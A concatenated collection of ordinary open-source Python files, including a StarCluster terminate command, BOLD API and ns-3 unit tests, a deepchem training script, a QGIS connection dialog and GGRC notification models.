# StarCluster is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# StarCluster is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with StarCluster. If not, see <http://www.gnu.org/licenses/>.
from starcluster import exception
from starcluster.logger import log
from completers import ClusterCompleter
class CmdTerminate(ClusterCompleter):
"""
terminate [options] <cluster_tag> ...
Terminate a running or stopped cluster
Example:
$ starcluster terminate mycluster
This will terminate a currently running or stopped cluster tagged
"mycluster".
All nodes will be terminated, all spot requests (if any) will be
cancelled, and the cluster's security group will be removed. If the
cluster uses EBS-backed nodes then each node's root volume will be
deleted. If the cluster uses "cluster compute" instance types the
cluster's placement group will also be removed.
"""
names = ['terminate']
def addopts(self, parser):
parser.add_option("-c", "--confirm", dest="confirm",
action="store_true", default=False,
help="Do not prompt for confirmation, "
"just terminate the cluster")
parser.add_option("-f", "--force", dest="force", action="store_true",
default=False, help="Terminate cluster regardless "
"of errors if possible ")
def _terminate_cluster(self, cl):
if not self.opts.confirm:
action = 'Terminate'
if cl.is_ebs_cluster():
action = 'Terminate EBS'
resp = raw_input(
"%s cluster %s (y/n)? " % (action, cl.cluster_tag))
if resp not in ['y', 'Y', 'yes']:
log.info("Aborting...")
return
cl.terminate_cluster()
def _terminate_manually(self, cl):
if not self.opts.confirm:
resp = raw_input("Terminate cluster %s (y/n)? " % cl.cluster_tag)
if resp not in ['y', 'Y', 'yes']:
log.info("Aborting...")
return
insts = cl.cluster_group.instances()
for inst in insts:
log.info("Terminating %s" % inst.id)
inst.terminate()
cl.terminate_cluster(force=True)
def terminate(self, cluster_name, force=False):
if force:
log.warn("Ignoring cluster settings due to --force option")
try:
cl = self.cm.get_cluster(cluster_name, load_receipt=not force,
require_keys=not force)
if force:
self._terminate_manually(cl)
else:
self._terminate_cluster(cl)
except exception.ClusterDoesNotExist:
raise
except Exception:
log.error("Failed to terminate cluster!", exc_info=True)
if not force:
log.error("Use -f to forcefully terminate the cluster")
raise
def execute(self, args):
if not args:
self.parser.error("please specify a cluster")
for cluster_name in args:
try:
self.terminate(cluster_name, force=self.opts.force)
except EOFError:
print 'Interrupted, exiting...'
return
|
ol-loginov/intellij-community | refs/heads/master | python/testData/stubs/DunderAll.py | 83 | __all__ = ['foo', 'bar']
|
carlosp420/bold | refs/heads/master | tests/test_bold_api.py | 1 | # -*- coding: utf-8 -*-
import unittest
import warnings
from Bio import BiopythonWarning
from Bio._py3k import HTTPError
from Bio import MissingExternalDependencyError
import bold
from bold import api
class TestApi(unittest.TestCase):
def setUp(self):
warnings.simplefilter('ignore', BiopythonWarning)
def test_call_id(self):
seq = "TTTTTGGTATTTGAGCAGGAATAGTAGGAACTTCTCTCAGTTTAATTATTCGAATAGAATTAGGTAATCCAGGTTTCTTAATTGGAGATGATCAAATTTATAATACTATTGTAACAGCCCATGCTTTTATTATAATTTTTTTTATAGTTATACCTATTGTAATTGGAGGATTTGGAAATTGACTAGTTCCCCTAATATTAGGTGCACCTGATATAGCTTTCCCTCGTATAAATAATATAAGATATTGACTACTTCCACCATCTTTAATATTATTAATTTCAAGTAGTATTGTAGAAAATGGAGCTGGAACAGGTTGAACAGTTTACCCCCCTCTTTCCTCTAATATTGCTCATAGAGGAACCTCAGTAGACTTAGCAATTTTTTCTCTTCATTTAGCTGGTATTTCTTCTATTTTAGGAGCTATTAATTTTATTACTACAATTATTAATATACGAGTTAATGGAATATCCTATGATCAAATACCTTTATTTGTTTGAGCTGTTGGAATTACAGCTCTTCTTTTACTTCTTTCTTTACCTGTTTTAGCAGGAGCTATCACAATACTTCTTACAGATCGAAATTTAAATACATCATTTTTTGATCCTGCAGGAGGAGGTGATCCAATTTTATACCAACATTTATTTTGATTTTTTGGTCACCC"
db = "COX1_SPECIES_PUBLIC"
res = bold.call_id(seq, db)
for item in res.items:
if item['similarity'] == 1:
self.assertEqual('Euptychia ordinata', item['taxonomic_identification'])
def test_call_taxon_search(self):
taxonomic_identification = 'Euptychia ordinata'
expected = 302603
res = bold.call_taxon_search(taxonomic_identification, fuzzy=False)
item = res.items[0]
self.assertEqual(expected, item['tax_id'])
taxonomic_identification = 'Fabaceae'
res = bold.call_taxon_search(taxonomic_identification, fuzzy=False)
item = res.items[0]
self.assertEqual('Plants', item['tax_division'])
self.assertEqual(187, item['parent_id'])
self.assertEqual('Fabales', item['parent_name'])
self.assertEqual('Fabaceae', item['taxon_rep'])
taxonomic_identification = 'Diplura'
res = bold.call_taxon_search(taxonomic_identification, fuzzy=False)
self.assertEqual(2, len(res.items))
def test_call_taxon_search_returns_empty(self):
taxonomic_identification = 'Fake species name'
self.assertRaises(ValueError, bold.call_taxon_search, taxonomic_identification, fuzzy=False)
def test_call_taxon_search_fuzzy_true(self):
taxonomic_identification = 'Fabaceae'
res = bold.call_taxon_search(taxonomic_identification, fuzzy=True)
self.assertEqual(5, len(res.items))
def test_call_taxon_search_fuzzy_error(self):
self.assertRaises(ValueError, bold.call_taxon_search, 'Fabaceae', 'true')
def test_call_specimen_data(self):
taxon = 'Euptychia'
res = bold.call_specimen_data(taxon)
item = res.items[0]
self.assertEqual('Nymphalidae', item['taxonomy_family_taxon_name'])
def test_call_specimen_data_several_taxa(self):
taxon = 'Euptychia|Mycalesis'
res = bold.call_specimen_data(taxon)
self.assertTrue('Mycalesis' in [item['taxonomy_genus_taxon_name'] for item in res.items])
def test_call_specimen_data_bin(self):
bin = 'BOLD:AAE2777'
res = bold.call_specimen_data(bin=bin)
taxonomy_identifications = []
append = taxonomy_identifications.append
for item in res.items:
if 'taxonomy_identification_provided_by' in item:
append(item['taxonomy_identification_provided_by'])
self.assertTrue('Jose Montero' in taxonomy_identifications)
def test_call_specimen_data_container(self):
container = 'ACRJP'
try:
res = bold.call_specimen_data(container=container)
except HTTPError:
# e.g. due to timeout
raise MissingExternalDependencyError("internet connection failed")
taxonomy_identifications = []
append = taxonomy_identifications.append
for item in res.items:
if 'taxonomy_identification_provided_by' in item:
append(item['taxonomy_identification_provided_by'])
self.assertTrue('Jacques L. Pierre' in taxonomy_identifications)
def test_call_specimen_data_institutions(self):
institutions = 'University of Turku'
res = bold.call_specimen_data(institutions=institutions)
taxonomy_identifications = []
append = taxonomy_identifications.append
for item in res.items:
if 'taxonomy_identification_provided_by' in item:
append(item['taxonomy_identification_provided_by'])
self.assertTrue('Meri Lindqvist' in taxonomy_identifications)
def test_call_specimen_data_researchers(self):
researchers = 'Thibaud Decaens'
res = bold.call_specimen_data(researchers=researchers)
collection_event_countries = []
append = collection_event_countries.append
for item in res.items:
if 'collection_event_country' in item:
append(item['collection_event_country'])
self.assertTrue('Peru' in collection_event_countries)
def test_call_specimen_data_geo(self):
geo = 'Iceland'
res = bold.call_specimen_data(geo=geo)
collection_event_countries = []
append = collection_event_countries.append
for item in res.items:
if 'collection_event_country' in item:
append(item['collection_event_country'])
self.assertTrue('Iceland' in collection_event_countries)
def test_call_specimen_data_format_tsv(self):
geo = 'Iceland'
res = bold.call_specimen_data(geo=geo, format='tsv')
self.assertTrue('Iceland' in res.items)
def test_call_specimen_data_wrong_format(self):
geo = 'Iceland'
self.assertRaises(ValueError, bold.call_specimen_data, geo=geo, format='csv')
def test_call_specimen_data_return_empty(self):
geo = 'Fake country name'
self.assertRaises(ValueError, bold.call_specimen_data, geo=geo)
def test_call_taxon_data_basic(self):
tax_id = 302603
# using default datatype='basic'
res = bold.call_taxon_data(tax_id, data_type='basic')
item = res.items[0]
self.assertEqual(7044, item['parent_id'])
def test_call_taxon_data_basic_empty(self):
tax_id = 302603
res = bold.call_taxon_data(tax_id)
item = res.items[0]
self.assertEqual(7044, item['parent_id'])
def test_call_taxon_data_includetree_false(self):
tax_id = 302603
# using default datatype='basic'
res = bold.call_taxon_data(tax_id, data_type='basic', include_tree=False)
item = res.items[0]
self.assertEqual(7044, item['parent_id'])
def test_call_taxon_data_includetree_true(self):
tax_id = 302603
# using default datatype='basic'
res = bold.call_taxon_data(tax_id, data_type='basic', include_tree=True)
self.assertEqual(7, len(res.items))
def test_call_taxon_data_includetree_error(self):
tax_id = 302603
# using default datatype='basic'
        self.assertRaises(ValueError, bold.call_taxon_data, tax_id, 'basic', 'true')
def test_call_sequence_data(self):
taxon = 'Hermeuptychia'
geo = 'Peru'
res = bold.call_sequence_data(taxon=taxon, geo=geo)
items = res.items
seq_record_ids = [item.id for item in items]
self.assertTrue('GBLN4477-14|Hermeuptychia' in seq_record_ids)
def test_call_sequence_data_returns_empty(self):
taxon = 'Fake taxon'
geo = 'Fake country'
self.assertRaises(ValueError, bold.call_sequence_data, taxon, geo)
def test_call_full_data(self):
taxon = 'Hermeuptychia'
geo = 'Peru'
res = bold.call_full_data(taxon=taxon, geo=geo)
genbank_accession_numbers = [item['specimen_identifiers_sample_id'] for item in res.items]
self.assertTrue('KF466142' in genbank_accession_numbers)
def test_call_full_data_invalid(self):
geo = 'Peru'
format = 'csv'
self.assertRaises(ValueError, bold.call_full_data, geo=geo, format=format)
def test_call_trace_files(self):
taxon = 'Euptychia mollis'
institutions = 'York University'
res = bold.call_trace_files(taxon=taxon,
institutions=institutions)
self.assertNotEqual(res.file_contents, None)
def test_parse_json(self):
res = api.Response()
# call_taxon_search
json_string = '{"302603":{"taxid":302603,"taxon":"Euptychia ordinata","tax_rank":"species","tax_division":"Animals","parentid":7044,"parentname":"Euptychia"}}'
res._parse_json(json_string)
item = res.items[0]
self.assertEqual(302603, item['tax_id'])
self.assertEqual(7044, item['parent_id'])
# data_type = basic
json_string = '{"taxid":891,"taxon":"Fabaceae","tax_rank":"family","tax_division":"Plants","parentid":187,"parentname":"Fabales","taxonrep":"Fabaceae"}'
res._parse_json(json_string)
item = res.items[0]
self.assertEqual('Fabaceae', item['taxon'])
self.assertEqual('Plants', item['tax_division'])
# data_type = images
json_string = '{"images":[{"copyright_institution":"Smithsonian Tropical Research Institute","specimenid":2616716,"copyright":"Matthew J. MIller","imagequality":4,"photographer":"Oscar Lopez","image":"BSPBB\/MJM_7364_IMG_2240_d+1345758620.JPG","fieldnum":"MJM 7364","sampleid":"MJM 7364","mam_uri":null,"copyright_license":"CreativeCommons - Attribution Non-Commercial","meta":"Dorsal","copyright_holder":"Matthew J. MIller","catalognum":"","copyright_contact":"[email protected]","copyright_year":"2012","taxonrep":"Momotus momota","aspectratio":1.608,"original":true,"external":null}]}'
res._parse_json(json_string)
item = res.items[0]
self.assertEqual('Oscar Lopez', item['images'][0]['photographer'])
# data_type = geo
json_string = '{"country":{"Brazil":3,"Mexico":2,"Panama":10,"Guatemala":1,"Peru":13,"Bolivia":6,"Ecuador":2},"sitemap":"http:\/\/www.boldsystems.org\/index.php\/TaxBrowser_Maps_CollectionSites?taxid=88899"}'
res._parse_json(json_string)
item = res.items[0]
self.assertTrue('Brazil' in item['country'].keys())
# data_type = stats
json_string = '{"stats":{"publicspecies":2,"publicbins":3,"publicmarkersequences":{"COI-5P":6},"publicrecords":6,"specimenrecords":"45","sequencedspecimens":"25","barcodespecimens":"22","species":"3","barcodespecies":"3"}}'
res._parse_json(json_string)
item = res.items[0]
self.assertTrue('publicspecies' in item['stats'].keys())
# data_type = sequencinlabs
json_string = '{"sequencinglabs":{"Smithsonian Tropical Research Institute":7,"Biodiversity Institute of Ontario":13,"Universidade Federal de Minas Gerais":1,"Mined from GenBank":2,"Royal Ontario Museum":2}}'
res._parse_json(json_string)
item = res.items[0]
self.assertTrue('Royal Ontario Museum' in item['sequencinglabs'].keys())
# data_type = thirdparty
json_string = r'{"taxid": 88899, "taxon": "Momotus", "tax_rank": "genus", "tax_division": "Animals", "parentid": 88898, "parentname": "Momotidae", "wikipedia_summary": "Momotus</b></i> is a small genus of the motmots, a family of near passerine birds found in forest and woodland of the Neotropics. They have a colourful plumage, which is green on the back becoming blue on the flight feathers and the long tails. The barbs near the ends of the two longest central tail feathers fall off, leaving a length of bare shaft so that tails appear racket-shaped. \n\nMomotus</i> species, like other motmots, eat small prey such as insects and lizards, and will also take fruit. They nest in tunnels in banks, laying about four white eggs.", "wikipedia_link": "http://en.wikipedia.org/wiki/Momotus", "gbif_map": "http://data.gbif.org/species/2475289/overviewMap.png"}'
res._parse_json(json_string)
item = res.items[0]
self.assertTrue('wikipedia_summary' in item.keys())
def test_parse_data_empty(self):
result_string = ''
response = api.Response()
self.assertRaises(ValueError, response._parse_data, 'call_id', result_string)
def tearDown(self):
pass
if __name__ == '__main__':
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
Shaswat27/sympy | refs/heads/master | sympy/combinatorics/tests/test_group_constructs.py | 129 | from sympy.combinatorics.group_constructs import DirectProduct
from sympy.combinatorics.named_groups import CyclicGroup, DihedralGroup
def test_direct_product_n():
C = CyclicGroup(4)
D = DihedralGroup(4)
G = DirectProduct(C, C, C)
assert G.order() == 64
assert G.degree == 12
assert len(G.orbits()) == 3
assert G.is_abelian is True
H = DirectProduct(D, C)
assert H.order() == 32
assert H.is_abelian is False
|
ibc/MediaSoup | refs/heads/v3 | worker/deps/gyp/test/mac/gyptest-unicode-settings.py | 246 | #!/usr/bin/env python
# Copyright 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that unicode strings in 'xcode_settings' work.
Also checks that ASCII control characters are escaped properly.
"""
import TestGyp
import sys
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['xcode'])
test.run_gyp('test.gyp', chdir='unicode-settings')
test.build('test.gyp', test.ALL, chdir='unicode-settings')
test.pass_test()
|
barbuza/django | refs/heads/master | tests/gis_tests/geoapp/sitemaps.py | 452 | from django.contrib.gis.sitemaps import KMLSitemap, KMZSitemap
from .models import City, Country
sitemaps = {'kml': KMLSitemap([City, Country]),
'kmz': KMZSitemap([City, Country]),
}
|
LeaWolf2/Lea | refs/heads/master | py/openage/convert/fix_data.py | 46 | # data fixing script
#
# as you can imagine, the data entries may contain some semi-correct
# values, which we need to adapt. this is done in this file.
def fix_data(data):
"""
updates given input with modifications.
input: empiresdat object, vanilla, fully read.
output: empiresdat object, fixed.
"""
###
# Terrain fixes
###
#remove terrains with slp_id == -1
#we'll need them again in the future, with fixed slp ids
slp_ge0 = lambda x: x.slp_id >= 0
data.terrains = list(filter(slp_ge0, data.terrains))
#assign correct blending modes
#key: dat file stored mode
#value: corrected mode
#resulting values are also priorities!
# -> higher => gets selected as mask for two partners
blendmode_map = {
#identical modes: [0,1,7,8], [4,6]
0: 1, #dirt, grass, palm_desert
1: 3, #farms
2: 2, #beach
3: 0, #water
4: 1, #shallows
5: 4, #roads
6: 5, #ice
7: 6, #snow
8: 4, #no terrain has it, but the mode exists..
}
for terrain in data.terrains:
terrain.blend_mode = blendmode_map[terrain.blend_mode]
#set correct terrain ids
for idx, terrain in enumerate(data.terrains):
terrain.terrain_id = idx
return data
|
adeepkit01/networks | refs/heads/master | utils/python-unit-tests.py | 155 | import unittest
from ns.core import Simulator, Seconds, Config, int64x64_t
import ns.core
import ns.network
import ns.internet
import ns.mobility
import ns.csma
import ns.applications
class TestSimulator(unittest.TestCase):
def testScheduleNow(self):
def callback(args):
self._args_received = args
self._cb_time = Simulator.Now()
Simulator.Destroy()
self._args_received = None
self._cb_time = None
Simulator.ScheduleNow(callback, "args")
Simulator.Run()
self.assertEqual(self._args_received, "args")
self.assertEqual(self._cb_time.GetSeconds(), 0.0)
def testSchedule(self):
def callback(args):
self._args_received = args
self._cb_time = Simulator.Now()
Simulator.Destroy()
self._args_received = None
self._cb_time = None
Simulator.Schedule(Seconds(123), callback, "args")
Simulator.Run()
self.assertEqual(self._args_received, "args")
self.assertEqual(self._cb_time.GetSeconds(), 123.0)
def testScheduleDestroy(self):
def callback(args):
self._args_received = args
self._cb_time = Simulator.Now()
Simulator.Destroy()
self._args_received = None
self._cb_time = None
def null(): pass
Simulator.Schedule(Seconds(123), null)
Simulator.ScheduleDestroy(callback, "args")
Simulator.Run()
Simulator.Destroy()
self.assertEqual(self._args_received, "args")
self.assertEqual(self._cb_time.GetSeconds(), 123.0)
def testScheduleWithContext(self):
def callback(context, args):
self._context_received = context
self._args_received = args
self._cb_time = Simulator.Now()
Simulator.Destroy()
self._args_received = None
self._cb_time = None
self._context_received = None
Simulator.ScheduleWithContext(54321, Seconds(123), callback, "args")
Simulator.Run()
self.assertEqual(self._context_received, 54321)
self.assertEqual(self._args_received, "args")
self.assertEqual(self._cb_time.GetSeconds(), 123.0)
def testTimeComparison(self):
self.assert_(Seconds(123) == Seconds(123))
self.assert_(Seconds(123) >= Seconds(123))
self.assert_(Seconds(123) <= Seconds(123))
self.assert_(Seconds(124) > Seconds(123))
self.assert_(Seconds(123) < Seconds(124))
def testTimeNumericOperations(self):
self.assertEqual(Seconds(10) + Seconds(5), Seconds(15))
self.assertEqual(Seconds(10) - Seconds(5), Seconds(5))
v1 = int64x64_t(5.0)*int64x64_t(10)
self.assertEqual(v1, int64x64_t(50))
def testConfig(self):
Config.SetDefault("ns3::OnOffApplication::PacketSize", ns.core.UintegerValue(123))
# hm.. no Config.Get?
def testSocket(self):
node = ns.network.Node()
internet = ns.internet.InternetStackHelper()
internet.Install(node)
self._received_packet = None
def rx_callback(socket):
assert self._received_packet is None
self._received_packet = socket.Recv()
sink = ns.network.Socket.CreateSocket(node, ns.core.TypeId.LookupByName("ns3::UdpSocketFactory"))
sink.Bind(ns.network.InetSocketAddress(ns.network.Ipv4Address.GetAny(), 80))
sink.SetRecvCallback(rx_callback)
source = ns.network.Socket.CreateSocket(node, ns.core.TypeId.LookupByName("ns3::UdpSocketFactory"))
source.SendTo(ns.network.Packet(19), 0, ns.network.InetSocketAddress(ns.network.Ipv4Address("127.0.0.1"), 80))
Simulator.Run()
self.assert_(self._received_packet is not None)
self.assertEqual(self._received_packet.GetSize(), 19)
def testAttributes(self):
##
## Yes, I know, the GetAttribute interface for Python is
## horrible, we should fix this soon, I hope.
##
queue = ns.network.DropTailQueue()
queue.SetAttribute("MaxPackets", ns.core.UintegerValue(123456))
limit = ns.core.UintegerValue()
queue.GetAttribute("MaxPackets", limit)
self.assertEqual(limit.Get(), 123456)
## -- object pointer values
mobility = ns.mobility.RandomWaypointMobilityModel()
ptr = ns.core.PointerValue()
mobility.GetAttribute("PositionAllocator", ptr)
self.assertEqual(ptr.GetObject(), None)
pos = ns.mobility.ListPositionAllocator()
mobility.SetAttribute("PositionAllocator", ns.core.PointerValue(pos))
ptr = ns.core.PointerValue()
mobility.GetAttribute("PositionAllocator", ptr)
self.assert_(ptr.GetObject() is not None)
def testIdentity(self):
csma = ns.csma.CsmaNetDevice()
channel = ns.csma.CsmaChannel()
csma.Attach(channel)
c1 = csma.GetChannel()
c2 = csma.GetChannel()
self.assert_(c1 is c2)
def testTypeId(self):
typeId1 = ns.core.TypeId.LookupByNameFailSafe("ns3::UdpSocketFactory")
self.assertEqual(typeId1.GetName (), "ns3::UdpSocketFactory")
self.assertRaises(KeyError, ns.core.TypeId.LookupByNameFailSafe, "__InvalidTypeName__")
def testCommandLine(self):
cmd = ns.core.CommandLine()
cmd.AddValue("Test1", "this is a test option")
cmd.AddValue("Test2", "this is a test option")
cmd.AddValue("Test3", "this is a test option", variable="test_xxx")
cmd.Test1 = None
cmd.Test2 = None
cmd.test_xxx = None
class Foo:
pass
foo = Foo()
foo.test_foo = None
cmd.AddValue("Test4", "this is a test option", variable="test_foo", namespace=foo)
cmd.Parse(["python", "--Test1=value1", "--Test2=value2", "--Test3=123", "--Test4=xpto"])
self.assertEqual(cmd.Test1, "value1")
self.assertEqual(cmd.Test2, "value2")
self.assertEqual(cmd.test_xxx, "123")
self.assertEqual(foo.test_foo, "xpto")
def testSubclass(self):
class MyNode(ns.network.Node):
def __init__(self):
super(MyNode, self).__init__()
node = MyNode()
if __name__ == '__main__':
unittest.main()
|
commtrack/commtrack-core | refs/heads/master | utilities/data_migration/reporter_upgrade.py | 5 | None
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import os
from django.utils import simplejson
def run():
print "starting"
from hq.models import ExtUser, ReporterProfile
from reporters.models import Reporter, PersistantBackend, PersistantConnection
all_users = ExtUser.objects.all()
for user in all_users:
print "processing user %s" % user
rep = user.reporter
if rep:
print "%s already has attached reporter object! %s" % (user, reporter)
else:
rep = Reporter()
# if they have a first and last name set, use those,
# otherwise just use the login
if user.first_name and user.last_name:
alias, fn, ln = Reporter.parse_name("%s %s" % (user.first_name, user.last_name))
else:
alias, fn, ln = Reporter.parse_name(user.username)
print "Chose alias: %s first last: %s %s" % (alias, fn, ln)
rep.first_name = fn
rep.last_name = ln
rep.alias = alias
rep.save()
profile = ReporterProfile()
profile.reporter = rep
profile.chw_id = user.chw_id
profile.chw_username = user.chw_username
profile.domain = user.domain
profile.save()
print "Saved profile %s for %s" % (profile, user)
if user.primary_phone:
# create a backend / connection for them. This is
# still a little hazy as it's not clear how the
# backend is properly chosen
# this will create an arbitrary backend if none is
# found
if len(PersistantBackend.objects.all()) == 0:
PersistantBackend.objects.create(slug="data_migration",
title="Data Migration Backend")
backend = PersistantBackend.objects.all()[0]
try:
conn = PersistantConnection.objects.create(backend=backend,
identity=user.primary_phone,
reporter=rep)
print "created connection %s for %s" % (conn, user)
except Exception, e:
print "Error creating connection for %s for number %s. Is it possible you have duplicate phone numbers?" % (user, user.primary_phone)
print "done"
|
bowenliu16/deepchem | refs/heads/master | examples/gdb7/gdb7_tf.py | 1 | """
Script that trains Tensorflow singletask models on GDB7 dataset.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import os
import deepchem as dc
import numpy as np
import shutil
from sklearn.kernel_ridge import KernelRidge
np.random.seed(123)
base_dir = "/tmp/gdb7_sklearn"
data_dir = os.path.join(base_dir, "dataset")
model_dir = os.path.join(base_dir, "model")
train_dir = os.path.join(base_dir, "train")
test_dir = os.path.join(base_dir, "test")
if os.path.exists(base_dir):
shutil.rmtree(base_dir)
os.makedirs(base_dir)
max_num_atoms = 23
featurizers = dc.feat.CoulombMatrixEig(max_num_atoms)
input_file = "gdb7.sdf"
tasks = ["u0_atom"]
smiles_field = "smiles"
mol_field = "mol"
featurizer = dc.data.SDFLoader(tasks, smiles_field=smiles_field, mol_field=mol_field, featurizer=featurizers)
dataset = featurizer.featurize(input_file, data_dir)
random_splitter = dc.splits.RandomSplitter()
train_dataset, test_dataset = random_splitter.train_test_split(dataset, train_dir, test_dir)
transformers = [dc.trans.NormalizationTransformer(transform_X=True, dataset=train_dataset), dc.trans.NormalizationTransformer(transform_y=True, dataset=train_dataset)]
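# Normalization statistics for both features and targets are fit on the training
# split only and then applied to the training and test splits below.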
for transformer in transformers:
train_dataset = transformer.transform(train_dataset)
for transformer in transformers:
test_dataset = transformer.transform(test_dataset)
regression_metric = dc.metrics.Metric(dc.metrics.mean_absolute_error, mode="regression")
model = dc.models.TensorflowMultiTaskRegressor(n_tasks=len(tasks), n_features=23, logdir=model_dir,
learning_rate=.001, momentum=.8, batch_size=512,
weight_init_stddevs=[1/np.sqrt(2000),1/np.sqrt(800),1/np.sqrt(800),1/np.sqrt(1000)],
bias_init_consts=[0.,0.,0.,0.], layer_sizes=[2000,800,800,1000],
dropouts=[0.1,0.1,0.1,0.1])
# Fit trained model
model.fit(train_dataset)
model.save()
train_evaluator = dc.utils.evaluate.Evaluator(model, train_dataset, transformers)
train_scores = train_evaluator.compute_model_performance([regression_metric])
print("Train scores [kcal/mol]")
print(train_scores)
test_evaluator = dc.utils.evaluate.Evaluator(model, test_dataset, transformers)
test_scores = test_evaluator.compute_model_performance([regression_metric])
print("Validation scores [kcal/mol]")
print(test_scores)
|
t-hey/QGIS-Original | refs/heads/master | python/plugins/MetaSearch/dialogs/newconnectiondialog.py | 28 | # -*- coding: utf-8 -*-
###############################################################################
#
# CSW Client
# ---------------------------------------------------------
# QGIS Catalog Service client.
#
# Copyright (C) 2010 NextGIS (http://nextgis.org),
# Alexander Bruy ([email protected]),
# Maxim Dubinin ([email protected])
#
# Copyright (C) 2017 Tom Kralidis ([email protected])
#
# This source is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This code is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
###############################################################################
from qgis.core import QgsSettings
from qgis.PyQt.QtWidgets import QDialog, QMessageBox
from MetaSearch.util import get_ui_class
BASE_CLASS = get_ui_class('newconnectiondialog.ui')
class NewConnectionDialog(QDialog, BASE_CLASS):
"""Dialogue to add a new CSW entry"""
def __init__(self, conn_name=None):
"""init"""
QDialog.__init__(self)
self.setupUi(self)
self.settings = QgsSettings()
self.conn_name = None
self.conn_name_orig = conn_name
self.username = None
self.password = None
def accept(self):
"""add CSW entry"""
conn_name = self.leName.text().strip()
conn_url = self.leURL.text().strip()
conn_username = self.leUsername.text().strip()
conn_password = self.lePassword.text().strip()
if any([conn_name == '', conn_url == '']):
QMessageBox.warning(self, self.tr('Save Connection'),
self.tr('Both Name and URL must be provided.'))
return
if '/' in conn_name:
QMessageBox.warning(self, self.tr('Save Connection'),
self.tr('Name cannot contain \'/\'.'))
return
if conn_name is not None:
key = '/MetaSearch/%s' % conn_name
keyurl = '%s/url' % key
key_orig = '/MetaSearch/%s' % self.conn_name_orig
# warn if entry was renamed to an existing connection
if all([self.conn_name_orig != conn_name,
self.settings.contains(keyurl)]):
res = QMessageBox.warning(self, self.tr('Save Connection'),
self.tr('Overwrite {0}?').format(conn_name),
QMessageBox.Ok | QMessageBox.Cancel)
if res == QMessageBox.Cancel:
return
# on rename delete original entry first
if all([self.conn_name_orig is not None,
self.conn_name_orig != conn_name]):
self.settings.remove(key_orig)
self.settings.setValue(keyurl, conn_url)
self.settings.setValue('/MetaSearch/selected', conn_name)
if conn_username != '':
self.settings.setValue('%s/username' % key, conn_username)
if conn_password != '':
self.settings.setValue('%s/password' % key, conn_password)
QDialog.accept(self)
def reject(self):
"""back out of dialogue"""
QDialog.reject(self)
|
plamut/ggrc-core | refs/heads/develop | src/ggrc/models/notification.py | 6 | # Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""GGRC notification SQLAlchemy layer data model extensions."""
from sqlalchemy.orm import backref
from ggrc import db
from ggrc.models.mixins import Base
from ggrc.models import utils
class NotificationConfig(Base, db.Model):
__tablename__ = 'notification_configs'
name = db.Column(db.String, nullable=True)
enable_flag = db.Column(db.Boolean)
notif_type = db.Column(db.String)
person_id = db.Column(db.Integer, db.ForeignKey('people.id'), nullable=False)
person = db.relationship(
'Person',
backref=backref('notification_configs', cascade='all, delete-orphan'))
_publish_attrs = [
'person_id',
'notif_type',
'enable_flag',
]
VALID_TYPES = [
'Email_Now',
'Email_Digest',
'Calendar',
]
class NotificationType(Base, db.Model):
__tablename__ = 'notification_types'
name = db.Column(db.String, nullable=False)
description = db.Column(db.String, nullable=True)
advance_notice = db.Column(db.DateTime, nullable=True)
template = db.Column(db.String, nullable=True)
instant = db.Column(db.Boolean, nullable=False, default=False)
class Notification(Base, db.Model):
__tablename__ = 'notifications'
object_id = db.Column(db.Integer, nullable=False)
object_type = db.Column(db.String, nullable=False)
send_on = db.Column(db.DateTime, nullable=False)
sent_at = db.Column(db.DateTime, nullable=True)
custom_message = db.Column(db.Text, nullable=True)
force_notifications = db.Column(db.Boolean, default=False, nullable=False)
notification_type_id = db.Column(
db.Integer, db.ForeignKey('notification_types.id'), nullable=False)
notification_type = db.relationship(
'NotificationType', foreign_keys='Notification.notification_type_id')
object = utils.PolymorphicRelationship("object_id", "object_type",
"{}_notifiable")
|
WQuanfeng/bootcamp | refs/heads/master | bootcamp/activities/tests.py | 24123 | from django.test import TestCase
# Create your tests here.
|
mkrupcale/ansible | refs/heads/devel | lib/ansible/modules/utilities/helper/_fireball.py | 12 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['deprecated'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: fireball
short_description: Enable fireball mode on remote node
version_added: "0.9"
deprecated: "in favor of SSH with ControlPersist"
description:
- Modern SSH clients support ControlPersist which is just as fast as
fireball was. Please enable that in ansible.cfg as a replacement
for fireball.
- Removed in ansible 2.0.
author:
- "Ansible Core Team"
- "Michael DeHaan"
'''
EXAMPLES = '''
'''
|
plastboks/Pulpy | refs/heads/develop | pulpy/views/__init__.py | 1 | # views
from pulpy.views.main import MainViews
from pulpy.views.auth import AuthViews
from pulpy.views.account import AccountViews
from pulpy.views.note import NoteViews
|
sungpil/bigshow | refs/heads/master | com/sundaytoz/bigshow/schedule.py | 1 | import logging
from daemonize import Daemonize
